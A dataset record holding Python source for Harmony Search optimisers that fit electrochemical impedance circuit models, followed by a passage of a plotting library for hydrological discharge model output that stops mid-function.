] | null | null | null |
import copy
import random
from time import perf_counter
import os
import sys
sys.path.append('../../../')
from utils.file_utils.filename_utils import get_ecm_num_str, get_Num_len
from data_processor.GOA_simulation.GOA_ECMs_simulation import load_sim_ecm_para_config_dict
from goa.GOA_criterions import goa_criterion_pack
from GA_pack.fittness_functions.eis_fitness import cal_EIS_WSE_fitness_1
class HS:
    """Basic Harmony Search (HS) optimiser over a box-constrained space.

    Refer:
        paper1 - A New Heuristic Optimization Algorithm: Harmony Search
        paper2 - Research on the search mechanism of the harmony search
                 algorithm and its applications (chapter 2 introduces the
                 basic HS algorithm and its steps, table 2-1)

    Version:
        First

    Adjustable parameters:
        hmcr: Harmony Memory Considering Rate, in (0 ~ 1)
        par:  Pitch Adjusting Rate, in (0 ~ 1)
    """

    class Harmony:
        """One candidate solution: a position vector and its fitness."""

        def __init__(self, limits_list, fitness_function):
            self.limits_list = limits_list
            self.fitness_function = fitness_function
            # One uniform draw per dimension inside that dimension's bounds.
            self.x_list = [random.uniform(low, high) for low, high in limits_list]
            self.fitness = fitness_function(self.x_list)

        def update(self):
            """Re-sample any out-of-bounds coordinate, then re-evaluate fitness."""
            for dim_i, x in enumerate(self.x_list):
                low, high = self.limits_list[dim_i]
                if x < low or x > high:
                    self.x_list[dim_i] = random.uniform(low, high)
            self.fitness = self.fitness_function(self.x_list)

    def __init__(self, iter_num, harmony_num, limits_list, fitness_function, hmcr=0.5, par=0.1):
        """
        :param iter_num: number of search iterations to run
        :param harmony_num: harmony memory size (HMS), i.e. population size
        :param limits_list: per-dimension [lower, upper] bounds
        :param fitness_function: maps an x_list to a scalar (lower is better)
        :param hmcr: harmony memory considering rate
        :param par: pitch adjusting rate
        """
        self.iter_num = iter_num
        self.limits_list = limits_list
        self.fitness_function = fitness_function
        # hms = Harmony memory size: the number of harmonies kept in memory.
        self.harmony_num = harmony_num
        self.hmcr = hmcr
        self.par = par
        self.harmony_list = [self.Harmony(limits_list, fitness_function)
                             for _ in range(harmony_num)]
        # Seed the global best with one extra random harmony; it is replaced
        # as soon as a better memory member is seen in search().
        self.global_best_harmony = self.Harmony(limits_list, fitness_function)

    def search(self):
        """Run the search.

        :return: (list of each iteration's best harmony,
                  list of the global best harmony after each iteration),
                 both deep-copied snapshots.
        """
        cur_best_harmony_list = []
        global_best_harmony_list = []
        for _ in range(self.iter_num):
            # Ascending fitness: index 0 is the current best, -1 the worst.
            sorted_harmony_list = sorted(self.harmony_list,
                                         key=lambda harmony: harmony.fitness)
            cur_best_harmony = sorted_harmony_list[0]
            if cur_best_harmony.fitness < self.global_best_harmony.fitness:
                self.global_best_harmony = copy.deepcopy(cur_best_harmony)
            cur_best_harmony_list.append(copy.deepcopy(cur_best_harmony))
            global_best_harmony_list.append(copy.deepcopy(self.global_best_harmony))
            for _ in range(self.harmony_num):
                tmp_x_list = []
                for dim_i in range(len(self.limits_list)):
                    if random.random() < self.hmcr:
                        # Take this dimension's value from a random memory member.
                        # (Values are read only, so no defensive deep copy of the
                        # whole memory is needed, unlike the original version.)
                        x = random.sample([harmony.x_list[dim_i]
                                           for harmony in sorted_harmony_list], 1)[0]
                        # With probability PAR perturb x; a uniform disturbance is
                        # used instead of the paper's discrete pitch adjustment.
                        if random.random() < self.par:
                            dim_range = self.limits_list[dim_i][1] - self.limits_list[dim_i][0]
                            x = random.uniform(x - dim_range * self.par / 2,
                                               x + dim_range * self.par / 2)
                    else:
                        x = random.uniform(self.limits_list[dim_i][0],
                                           self.limits_list[dim_i][1])
                    tmp_x_list.append(x)
                tmp_harmony = self.Harmony(self.limits_list, self.fitness_function)
                tmp_harmony.x_list = tmp_x_list
                tmp_harmony.update()  # clamp to bounds and evaluate the candidate
                # Greedy replacement of the worst memory member.
                if tmp_harmony.fitness < sorted_harmony_list[-1].fitness:
                    sorted_harmony_list[-1] = tmp_harmony
                    sorted_harmony_list.sort(key=lambda harmony: harmony.fitness)
            # Members are never mutated after insertion, so a shallow copy
            # suffices (the original deep-copied the whole population here).
            self.harmony_list = list(sorted_harmony_list)
        return cur_best_harmony_list, global_best_harmony_list
# if __name__ == '__main__':
# iter_num = 1000
# harmony_num = 20
# dim = 7
#
# f1_limits_list = [[-100, 100] for i in range(dim)]
# from GA_pack.fittness_functions.f1 import f1
#
# f1_fitness_function = f1
# hs = HS(iter_num, harmony_num, f1_limits_list, f1_fitness_function)
# cur_best_harmony_list, global_best_harmony_list = hs.search()
# print('Best entity position:', hs.global_best_harmony.x_list)
# print('Fitness:', hs.global_best_harmony.fitness)
#
# # Draw the best entity in each iteration.
# iter_list = [i for i in range(iter_num)]
# cur_fitness_list = [entity.fitness for entity in cur_best_harmony_list]
# cur_global_fitness_list = [entity.fitness for entity in global_best_harmony_list]
#
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# line1, = ax.plot(iter_list, cur_fitness_list, label='Current Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, harmony_num, dim))
# line1.set_dashes([5, 5, 10, 5]) # 2pt line, 2pt break, 10pt line, 2pt break
# line2, = ax.plot(iter_list, cur_global_fitness_list, label='Current Global Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, harmony_num, dim))
# line2.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# ax.legend()
# plt.xlabel('Iteration times')
# plt.ylabel('Error rate')
# plt.title('Search the minimum of f1 = sum(Xi ^ 2)')
# plt.show()
class HS_EIS:
    """Harmony Search specialised for EIS equivalent-circuit-model fitting.

    Differs from HS in that the bounds ('limit') and the data required by the
    fitness function travel together in exp_data_dict, and in that the loop
    stops when the shared GOA convergence criterion fires rather than after a
    fixed iteration count.

    Refer:
        paper1 - A New Heuristic Optimization Algorithm: Harmony Search
        paper2 - Research on the search mechanism of the harmony search
                 algorithm and its applications (chapter 2, table 2-1)

    Adjustable parameters:
        hmcr: Harmony Memory Considering Rate, in (0 ~ 1)
        par:  Pitch Adjusting Rate, in (0 ~ 1)
    """

    class Harmony:
        """One candidate ECM parameter set and its fitness."""

        def __init__(self, exp_data_dict, fitness_function):
            self.exp_data_dict = exp_data_dict
            self.limits_list = exp_data_dict['limit']
            self.fitness_function = fitness_function
            self.x_list = [random.uniform(low, high) for low, high in self.limits_list]
            self.fitness = fitness_function(self.exp_data_dict, self.x_list)

        def update(self):
            """Re-sample any out-of-bounds coordinate, then re-evaluate fitness."""
            for dim_i, x in enumerate(self.x_list):
                low, high = self.limits_list[dim_i]
                if x < low or x > high:
                    self.x_list[dim_i] = random.uniform(low, high)
            self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)

    def __init__(self, exp_data_dict, iter_num, harmony_num, hmcr=0.5, par=0.1,
                 fitness_function=cal_EIS_WSE_fitness_1):
        """
        :param exp_data_dict: experiment config; must contain a 'limit' entry
        :param iter_num: maximum number of iterations (criterion may stop earlier)
        :param harmony_num: harmony memory size (population size)
        :param hmcr: harmony memory considering rate
        :param par: pitch adjusting rate
        :param fitness_function: f(exp_data_dict, x_list) -> scalar (minimised)
        """
        self.exp_data_dict = exp_data_dict
        self.limits_list = exp_data_dict['limit']
        self.iter_num = iter_num
        self.fitness_function = fitness_function
        # hms = Harmony memory size: the number of harmonies kept in memory.
        self.harmony_num = harmony_num
        self.hmcr = hmcr
        self.par = par
        self.harmony_list = [self.Harmony(self.exp_data_dict, fitness_function)
                             for _ in range(harmony_num)]
        # Seed the global best with one extra random harmony.
        self.global_best_harmony = self.Harmony(self.exp_data_dict, fitness_function)

    def search(self):
        """Run the search until the GOA criterion (or iter_num) stops it.

        :return: (cur_best_harmony_list, global_best_harmony_list,
                  number of iterations run, last chi-squared value)
        """
        cur_best_harmony_list = []
        global_best_harmony_list = []
        chi_squared = None  # defensive default; set once the criterion is first checked
        continue_criterion = True
        iteration = 0  # renamed from 'iter' to avoid shadowing the builtin
        while continue_criterion:
            sorted_harmony_list = sorted(self.harmony_list,
                                         key=lambda harmony: harmony.fitness)
            cur_best_harmony = sorted_harmony_list[0]
            if cur_best_harmony.fitness < self.global_best_harmony.fitness:
                self.global_best_harmony = copy.deepcopy(cur_best_harmony)
            cur_best_harmony_list.append(copy.deepcopy(cur_best_harmony))
            global_best_harmony_list.append(copy.deepcopy(self.global_best_harmony))
            for _ in range(self.harmony_num):
                tmp_x_list = []
                for dim_i in range(len(self.limits_list)):
                    if random.random() < self.hmcr:
                        # Values are read only; no deep copy of the memory needed.
                        x = random.sample([harmony.x_list[dim_i]
                                           for harmony in sorted_harmony_list], 1)[0]
                        # Uniform disturbance instead of discrete pitch adjustment.
                        if random.random() < self.par:
                            dim_range = self.limits_list[dim_i][1] - self.limits_list[dim_i][0]
                            x = random.uniform(x - dim_range * self.par / 2,
                                               x + dim_range * self.par / 2)
                    else:
                        x = random.uniform(self.limits_list[dim_i][0],
                                           self.limits_list[dim_i][1])
                    tmp_x_list.append(x)
                tmp_harmony = self.Harmony(self.exp_data_dict, self.fitness_function)
                tmp_harmony.x_list = tmp_x_list
                tmp_harmony.update()
                if tmp_harmony.fitness < sorted_harmony_list[-1].fitness:
                    sorted_harmony_list[-1] = tmp_harmony
                    sorted_harmony_list.sort(key=lambda harmony: harmony.fitness)
            self.harmony_list = list(sorted_harmony_list)
            # The criterion compares two successive global bests, so it can
            # only be evaluated from the second iteration onwards.
            if iteration >= 1:
                x_lists_list = [global_best_harmony_list[-2].x_list,
                                global_best_harmony_list[-1].x_list]
                goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list,
                                                                iter=iteration,
                                                                max_iter_time=self.iter_num,
                                                                data_dict=self.exp_data_dict)
                if goa_criterion:
                    continue_criterion = False
            iteration += 1
        return cur_best_harmony_list, global_best_harmony_list, iteration, chi_squared
class HS_EIS_access:
    """HS_EIS variant that logs each iteration's result to a text file.

    Identical search logic to HS_EIS, but search() takes a result filename
    and start time, appends one CSV-ish line per iteration, and returns
    nothing (results are consumed from the file).

    Refer:
        paper1 - A New Heuristic Optimization Algorithm: Harmony Search
        paper2 - Research on the search mechanism of the harmony search
                 algorithm and its applications (chapter 2, table 2-1)

    Adjustable parameters:
        hmcr: Harmony Memory Considering Rate, in (0 ~ 1)
        par:  Pitch Adjusting Rate, in (0 ~ 1)
    """

    class Harmony:
        """One candidate ECM parameter set and its fitness."""

        def __init__(self, exp_data_dict, fitness_function):
            self.exp_data_dict = exp_data_dict
            self.limits_list = exp_data_dict['limit']
            self.fitness_function = fitness_function
            self.x_list = [random.uniform(low, high) for low, high in self.limits_list]
            self.fitness = fitness_function(self.exp_data_dict, self.x_list)

        def update(self):
            """Re-sample any out-of-bounds coordinate, then re-evaluate fitness."""
            for dim_i, x in enumerate(self.x_list):
                low, high = self.limits_list[dim_i]
                if x < low or x > high:
                    self.x_list[dim_i] = random.uniform(low, high)
            self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)

    def __init__(self, exp_data_dict, iter_num, harmony_num, hmcr=0.5, par=0.1,
                 fitness_function=cal_EIS_WSE_fitness_1):
        """
        :param exp_data_dict: experiment config; must contain a 'limit' entry
        :param iter_num: maximum number of iterations (criterion may stop earlier)
        :param harmony_num: harmony memory size (population size)
        :param hmcr: harmony memory considering rate
        :param par: pitch adjusting rate
        :param fitness_function: f(exp_data_dict, x_list) -> scalar (minimised)
        """
        self.exp_data_dict = exp_data_dict
        self.limits_list = exp_data_dict['limit']
        self.iter_num = iter_num
        self.fitness_function = fitness_function
        # hms = Harmony memory size: the number of harmonies kept in memory.
        self.harmony_num = harmony_num
        self.hmcr = hmcr
        self.par = par
        self.harmony_list = [self.Harmony(self.exp_data_dict, fitness_function)
                             for _ in range(harmony_num)]
        self.global_best_harmony = self.Harmony(self.exp_data_dict, fitness_function)

    def search(self, res_fn, start_time):
        """Run the search, appending per-iteration results to *res_fn*.

        Each logged line is: iteration,[param,...],chi_squared,elapsed_seconds

        :param res_fn: path of the result text file (opened in append mode)
        :param start_time: perf_counter() timestamp taken before the run
        """
        cur_best_harmony_list = []
        global_best_harmony_list = []
        chi_squared = None  # defensive default; set once the criterion is first checked
        continue_criterion = True
        iteration = 0  # renamed from 'iter' to avoid shadowing the builtin
        while continue_criterion:
            sorted_harmony_list = sorted(self.harmony_list,
                                         key=lambda harmony: harmony.fitness)
            cur_best_harmony = sorted_harmony_list[0]
            if cur_best_harmony.fitness < self.global_best_harmony.fitness:
                self.global_best_harmony = copy.deepcopy(cur_best_harmony)
            cur_best_harmony_list.append(copy.deepcopy(cur_best_harmony))
            global_best_harmony_list.append(copy.deepcopy(self.global_best_harmony))
            for _ in range(self.harmony_num):
                tmp_x_list = []
                for dim_i in range(len(self.limits_list)):
                    if random.random() < self.hmcr:
                        # Values are read only; no deep copy of the memory needed.
                        x = random.sample([harmony.x_list[dim_i]
                                           for harmony in sorted_harmony_list], 1)[0]
                        # Uniform disturbance instead of discrete pitch adjustment.
                        if random.random() < self.par:
                            dim_range = self.limits_list[dim_i][1] - self.limits_list[dim_i][0]
                            x = random.uniform(x - dim_range * self.par / 2,
                                               x + dim_range * self.par / 2)
                    else:
                        x = random.uniform(self.limits_list[dim_i][0],
                                           self.limits_list[dim_i][1])
                    tmp_x_list.append(x)
                tmp_harmony = self.Harmony(self.exp_data_dict, self.fitness_function)
                tmp_harmony.x_list = tmp_x_list
                tmp_harmony.update()
                if tmp_harmony.fitness < sorted_harmony_list[-1].fitness:
                    sorted_harmony_list[-1] = tmp_harmony
                    sorted_harmony_list.sort(key=lambda harmony: harmony.fitness)
            self.harmony_list = list(sorted_harmony_list)
            if iteration >= 1:
                x_lists_list = [global_best_harmony_list[-2].x_list,
                                global_best_harmony_list[-1].x_list]
                goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list,
                                                                iter=iteration,
                                                                max_iter_time=self.iter_num,
                                                                data_dict=self.exp_data_dict,
                                                                CS_limit=1e-70)
                # Append this iteration's record immediately (crash-safe: the
                # file holds all completed iterations even if the run dies).
                with open(res_fn, 'a+') as file:
                    line = str(iteration) + ',[' \
                           + ','.join([str(para) for para in global_best_harmony_list[-1].x_list]) + '],' \
                           + str(chi_squared) + ',' + str(perf_counter() - start_time) + '\n'
                    file.write(line)
                if goa_criterion:
                    continue_criterion = False
            iteration += 1
def access_HS_EIS():
    """Benchmark HS_EIS_access on the nine simulated ECM datasets.

    For each of the 9 equivalent-circuit models, the harmony search is run
    100 times; every run writes its per-iteration results to its own text
    file, and a countdown of the remaining 900 runs is printed.
    """
    finished_count = 0
    # Iterate over the 9 ECMs
    for ecm_index in range(1, 10):
        ecm_sim_folder = '../../../datasets/goa_datasets/simulated'
        ecm_num = ecm_index
        ecm_num_str = get_ecm_num_str(ecm_num)
        file_path = os.path.join(ecm_sim_folder, 'ecm_' + ecm_num_str)
        sim_ecm = load_sim_ecm_para_config_dict(ecm_num, file_path)
        para_num = len(sim_ecm['para'])
        # Repeat the search 100 times for this ECM
        for run_index in range(100):
            t_start = perf_counter()
            # ------------------------------ Change GOA name ------------------------------
            goa = HS_EIS_access(exp_data_dict=sim_ecm, iter_num=10000, harmony_num=10 * para_num)
            res_fn = 'hs_ecm{0}_'.format(ecm_index) + get_Num_len(num=run_index, length=2) + '.txt'
            # ------------------------------ Change GOA name ------------------------------
            goa.search(res_fn, start_time=t_start)
            finished_count += 1
            print('HS left: {0}'.format(900 - finished_count))
# access_HS_EIS()
| 47.991892
| 165
| 0.599088
| 2,308
| 17,757
| 4.315425
| 0.100953
| 0.068474
| 0.052008
| 0.03012
| 0.833936
| 0.814357
| 0.796386
| 0.779819
| 0.761446
| 0.75241
| 0
| 0.01636
| 0.308104
| 17,757
| 370
| 166
| 47.991892
| 0.794319
| 0.251112
| 0
| 0.745283
| 0
| 0
| 0.008665
| 0.003067
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061321
| false
| 0
| 0.042453
| 0
| 0.141509
| 0.004717
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c93131ceab7de9702335f285f992a7c461103e6
| 305,160
|
py
|
Python
|
Dynamic_HD_Scripts/HD_Plots/plots/plots_library.py
|
ThomasRiddick/DynamicHD
|
bff378a49ff6c709dc59c2d6835852e1083df20a
|
[
"BSD-3-Clause"
] | 1
|
2021-08-04T07:51:18.000Z
|
2021-08-04T07:51:18.000Z
|
Dynamic_HD_Scripts/HD_Plots/plots/plots_library.py
|
ThomasRiddick/DynamicHD
|
bff378a49ff6c709dc59c2d6835852e1083df20a
|
[
"BSD-3-Clause"
] | 1
|
2022-01-27T22:12:45.000Z
|
2022-02-01T10:16:47.000Z
|
Dynamic_HD_Scripts/HD_Plots/plots/plots_library.py
|
ThomasRiddick/DynamicHD
|
bff378a49ff6c709dc59c2d6835852e1083df20a
|
[
"BSD-3-Clause"
] | null | null | null |
'''
A module containing a library of methods and classes to generate plots
needed for dynamic HD work. Which plots are created is controlled in
the main function.
Created on Jan 29, 2016
@author: thomasriddick
'''
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import gridspec
import matplotlib.animation as animation
import matplotlib.gridspec as gridspec
import numpy as np
import datetime
import textwrap
import os.path
import math
import copy
from netCDF4 import Dataset
from Dynamic_HD_Scripts.base import iodriver
from Dynamic_HD_Scripts.base import iohelper as iohlpr
from Dynamic_HD_Scripts.base import field
from Dynamic_HD_Scripts.base import grid
from Dynamic_HD_Scripts.utilities import utilities
from HD_Plots.utilities import plotting_tools as pts
from HD_Plots.utilities import match_river_mouths as mtch_rm
from HD_Plots.utilities import river_comparison_plotting_routines as rc_pts
from HD_Plots.utilities import flowmap_plotting_routines as fmp_pts #@UnresolvedImport
from HD_Plots.utilities.interactive_plotting_routines import Interactive_Plots
from HD_Plots.utilities.color_palette import ColorPalette #@UnresolvedImport
global interactive_plots
class Plots(object):
    """Common base class for all plot collections in this module."""

    # Root directories shared by every subclass: input data and scratch space.
    hd_data_path = '/Users/thomasriddick/Documents/data/HDdata/'
    scratch_dir = '/Users/thomasriddick/Documents/data/temp/'

    def __init__(self, save=False, color_palette_to_use='default'):
        """Record the save flag and resolve the colour palette by name."""
        self.save = save
        self.colors = ColorPalette(color_palette_to_use)
class HDparameterPlots(Plots):
    """Plots of HD model parameter fields read from hdpara files."""

    # Subdirectory of hd_data_path holding the hdpara files.
    hdfile_extension = "hdfiles"

    def __init__(self, save=False, color_palette_to_use='default'):
        """Resolve the hdpara file directory under the shared data root."""
        super(HDparameterPlots, self).__init__(save, color_palette_to_use)
        self.hdfile_path = os.path.join(self.hd_data_path, self.hdfile_extension)

    def flow_parameter_distribution_for_non_lake_cells_for_current_HD_model(self):
        """Calculate the distribution of flow parameter values for the current HD model in non lake cells"""
        hd_file = os.path.join(self.hdfile_path, "hdpara_file_from_current_model.nc")
        self._flow_parameter_distribution_helper(hd_file)

    def flow_parameter_distribution_current_HD_model_for_current_HD_model_reprocessed_without_lakes_and_wetlands(self):
        """Calculate the distribution of flow parameter values for the current model reprocessed without lakes/wetlands"""
        hd_file = os.path.join(self.hdfile_path, "generated",
                               "hd_file_regenerate_hd_file_without_lakes_"
                               "and_wetlands_20170113_173241.nc")
        self._flow_parameter_distribution_helper(hd_file)

    def flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs(self):
        """Calculate the distribution of flow parameter values for the current model reprocessed without lakes/wetlands"""
        hd_file = os.path.join(self.hdfile_path, "generated",
                               "hd_file_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
                               "sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc")
        self._flow_parameter_distribution_helper(hd_file)

    def flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_no_tuning(self):
        """Calculate the distribution of flow parameter values for the current model reprocessed without lakes/wetlands"""
        hd_file = os.path.join(self.hdfile_path, "generated",
                               "hd_file_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_"
                               "oceans_lsmask_plus_upscale_rdirs_20170112_161226.nc")
        self._flow_parameter_distribution_helper(hd_file)

    def _flow_parameter_distribution_helper(self, hd_file):
        """Load ARF_K and ARF_N from *hd_file* and histogram the non-zero k values.

        k values are masked wherever ARF_N < 5 before plotting.
        """
        file_type = iodriver.get_file_extension(hd_file)
        k_param = iodriver.load_field(filename=hd_file,
                                      file_type=file_type,
                                      field_type="Generic", unmask=False,
                                      fieldname="ARF_K", grid_type="HD")
        n_param = iodriver.load_field(filename=hd_file,
                                      file_type=file_type,
                                      field_type="Generic", unmask=False,
                                      fieldname="ARF_N", grid_type="HD")
        k_param.mask_field_with_external_mask(n_param.get_data() < 5)
        k_data = k_param.get_data()
        values = k_data[np.ma.nonzero(k_data)]
        ax = plt.figure().add_subplot(111)
        ax.hist(values, 150, range=(0.0, 1.5))
        ax.set_ylim(0.1, 100000)
        # NOTE(review): 'nonposy' was removed in matplotlib >= 3.4 in favour of
        # 'nonpositive'; kept as-is to match the environment this was written for.
        plt.yscale('log', nonposy='clip')
class HDOutputPlots(Plots):
"""A class for plotting HD offline (or online?) model output"""
rdirs_path_extension = 'rdirs'
jsbach_restart_file_path_extension = 'jsbachrestartfiles'
def __init__(self, save=False, color_palette_to_use='default'):
    """Set up the directory layout used by the HD-output plotting methods."""
    super(HDOutputPlots, self).__init__(save, color_palette_to_use)
    # Directories derived from the shared HD data root.
    self.rdirs_data_directory = os.path.join(self.hd_data_path, self.rdirs_path_extension)
    self.upscaled_rdirs_data_directory = os.path.join(self.rdirs_data_directory,
                                                      'generated', 'upscaled')
    self.jsbach_restart_file_directory = os.path.join(self.hd_data_path,
                                                      self.jsbach_restart_file_path_extension)
    self.generated_jsbach_restart_file_directory = os.path.join(self.jsbach_restart_file_directory,
                                                                'generated')
    self.hdinput_data_directory = os.path.join(self.hd_data_path, 'hdinputdata')
    self.cell_areas_data_directory = os.path.join(self.hd_data_path, 'gridareasandspacings')
    # HD discharge output lives outside the HDdata tree.
    self.river_discharge_output_data_path = '/Users/thomasriddick/Documents/data/HDoutput'
def check_water_balance_of_1978_for_constant_forcing_of_0_01(self):
    """Check the 1978 water balance of an HD run under constant forcing.

    Compares total inflow (land area times a constant per-m^2 forcing),
    total discharge into the oceans, and the change in reservoir content
    between the 1977 and 1978 restart files, printing the residuals.

    NOTE(review): the method name says 0_01 but the forcing value used below
    is 0.02 -- confirm which is intended before relying on the numbers.
    """
    lsmask = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/lsmasks/generated/"
                                 "ls_mask_ten_minute_data_from_virna_0k_ALG4_sinkless"
                                 "_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707_HD_transf.nc",
                                 ".nc", field_type='Generic', grid_type='HD')
    cell_areas = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/"
                                     "gridareasandspacings/hdcellareas.nc", ".nc",
                                     field_type='Generic', fieldname="cell_area", grid_type='HD')
    # Hoisted out of the loop: the discharge file path never changes.
    discharge_file = ("/Users/thomasriddick/Documents/data/HDoutput/hd_N01_1978-01-02_hd_"
                      "discharge_05__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
                      "sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc")
    # Stage the summation in 5-day blocks to reduce rounding error;
    # 73 blocks * 5 days = 365 daily timeslices.
    # NOTE(review): np.float128 is an x86 extended-precision alias and is not
    # available on every platform/NumPy build.
    five_day_discharges = []
    for block in range(73):
        for day in range(block * 5, (block + 1) * 5):
            discharge = iodriver.load_field(discharge_file, ".nc", field_type='Generic',
                                            fieldname="disch", timeslice=day, grid_type='HD')
            discharge_times_area = discharge.get_data() * cell_areas.get_data()
            if day == block * 5:
                five_day_discharges.append(np.sum(discharge_times_area, dtype=np.float128))
            else:
                five_day_discharges[-1] += np.sum(discharge_times_area, dtype=np.float128)
    total_discharge = np.sum(five_day_discharges, dtype=np.float128)
    lsmask_times_area = lsmask.get_data() * cell_areas.get_data()
    change_in_water = self._calculate_total_water_in_restart("/Users/thomasriddick/Documents/data/temp/hdrestart_1978.nc") -\
        self._calculate_total_water_in_restart("/Users/thomasriddick/Documents/data/temp/hdrestart_1977.nc")
    days_in_year = 365.0
    inflow_per_meter_squared = 0.02
    # Computed once instead of being re-derived inside every print statement.
    total_inflow = np.sum(lsmask_times_area, dtype=np.float128) * days_in_year * inflow_per_meter_squared
    print("Total water entering HD model: {0}".format(total_inflow))
    print("Total discharge into oceans: {0}".format(total_discharge))
    print("Total change in water in reservoirs: {0}".format(change_in_water))
    print("Total discharge - total inflow: {0}: ".format(total_discharge - total_inflow))
    print("(Total discharge - total inflow) + change in reservoirs: {0}".format(
        (total_discharge - total_inflow) + change_in_water))
    print("(Total discharge - total inflow) + change in reservoirs/Change in Reservoirs: {0}".format(
        ((total_discharge - total_inflow) + change_in_water) / change_in_water))
def _calculate_total_water_in_restart(self, restart_filename):
    """Sum the water held in every reservoir field of an HD restart file.

    Loads FGMEM, FINFL, FLFMEM and FRFMEM1..FRFMEM5 from the file and adds
    the sums of their data (the original repeated the same load-and-sum
    stanza once per field; this loops over the field names instead).

    :param restart_filename: path of the HD restart netCDF file
    :return: scalar total of all reservoir contents
    """
    fieldnames = ["FGMEM", "FINFL", "FLFMEM"] + \
                 ["FRFMEM{0}".format(i + 1) for i in range(5)]
    file_type = iodriver.get_file_extension(restart_filename)
    total_water = 0.0
    for fieldname in fieldnames:
        reservoir_field = iodriver.load_field(restart_filename,
                                              file_type=file_type,
                                              field_type="Generic",
                                              unmask=False,
                                              timeslice=None,
                                              fieldname=fieldname,
                                              grid_type="HD")
        # NOTE(review): np.float128 is x86-specific extended precision.
        total_water += np.sum(reservoir_field.get_data(), dtype=np.float128)
    return total_water
def _calculate_discharge_lost_to_changes_in_lsmask(self, lsmask_source_ref_filepath, lsmask_source_data_filepath,
                                                   run_off_filepath, discharge_filepath,
                                                   cell_areas_filepath, num_timeslices, grid_type="HD"):
    """Estimate the discharge lost where the reference and data land-sea masks differ.

    :param lsmask_source_ref_filepath: reference mask source (rdirs on the HD grid)
    :param lsmask_source_data_filepath: comparison mask source
    :param run_off_filepath: file with per-timeslice runoff (fieldname var501)
    :param discharge_filepath: file with per-timeslice drainage (fieldname var502)
    :param cell_areas_filepath: file with per-cell areas
    :param num_timeslices: number of timeslices to process
    :param grid_type: grid to work on; "HD" derives the masks from river directions
    :return: list with one lost-discharge total per timeslice
    """
    if grid_type == "HD":
        # On the HD grid the mask is derived from river directions: <= 0 is sea.
        rdirs_ref = iodriver.load_field(lsmask_source_ref_filepath, iodriver.get_file_extension(lsmask_source_ref_filepath),
                                        field_type='RiverDirections', unmask=True, grid_type='HD').get_data()
        lsmask_ref = (rdirs_ref <= 0).astype(np.int32)
        rdirs_data = iodriver.load_field(lsmask_source_data_filepath, iodriver.get_file_extension(lsmask_source_data_filepath),
                                         field_type='RiverDirections', unmask=True, grid_type='HD').get_data()
        lsmask_data = (rdirs_data <= 0).astype(np.int32)
    else:
        lsmask_ref = iodriver.load_field(lsmask_source_ref_filepath, iodriver.get_file_extension(lsmask_source_ref_filepath),
                                         field_type='RiverDirections', unmask=True, fieldname='slm', grid_type=grid_type).get_data()
        lsmask_data = iodriver.load_field(lsmask_source_data_filepath, iodriver.get_file_extension(lsmask_source_data_filepath),
                                          field_type='RiverDirections', unmask=True, fieldname='slm', grid_type=grid_type).get_data()
    cell_areas = iodriver.load_field(cell_areas_filepath, iodriver.get_file_extension(cell_areas_filepath),
                                     field_type='Generic', unmask=True, fieldname='cell_area', grid_type=grid_type).get_data()
    # Hoisted out of the timeslice loop: the masks do not change per slice.
    mask_difference = lsmask_ref - lsmask_data
    lost_discharge = []
    for timeslice in range(num_timeslices):
        run_off_field = iodriver.load_field(run_off_filepath, iodriver.get_file_extension(run_off_filepath),
                                            field_type='Generic', unmask=True, timeslice=timeslice, fieldname="var501",
                                            grid_type=grid_type).get_data() * \
            cell_areas
        discharge_field = iodriver.load_field(discharge_filepath, iodriver.get_file_extension(discharge_filepath),
                                              field_type='Generic', unmask=True, timeslice=timeslice, fieldname="var502",
                                              grid_type=grid_type).get_data() * \
            cell_areas
        run_off_field = run_off_field * mask_difference
        discharge_field = discharge_field * mask_difference
        lost_discharge.append(np.sum(run_off_field, dtype=np.float128) +
                              np.sum(discharge_field, dtype=np.float128))
    return lost_discharge
def _river_discharge_outflow_comparison_helper(self,ax,river_discharge_output_filepath,
rdirs_filepath,num_timeslices,lost_discharge=None,
label=None):
rdirs = iodriver.load_field(rdirs_filepath,
file_type=\
iodriver.get_file_extension(rdirs_filepath),
field_type='RiverDirections',
unmask=True,
grid_type='HD')
daily_global_river_discharge_outflow = np.zeros((num_timeslices))
for i in range(num_timeslices):
river_discharge = iodriver.load_field(river_discharge_output_filepath,
file_type=\
iodriver.get_file_extension(river_discharge_output_filepath),
field_type='RiverDischarge',
unmask=True,
timeslice=i,
fieldname='friv',
grid_type='HD')
river_discharge.set_non_outflow_points_to_zero(rdirs)
daily_global_river_discharge_outflow[i] =river_discharge.sum_river_outflow()
if lost_discharge is not None:
daily_global_river_discharge_outflow += lost_discharge
total_discharge_info = "Total discharge over year for {0}: {1} \n".format(label,np.sum(daily_global_river_discharge_outflow))
days = np.linspace(1,365,365)
ax.plot(days,daily_global_river_discharge_outflow,label=label)
return total_discharge_info
def plot_comparison_using_1990_rainfall_data(self):
ax = plt.subplots(1, 1, figsize=(12, 9))[1]
plt.ylim(0,7000000)
plt.xlim(1,365)
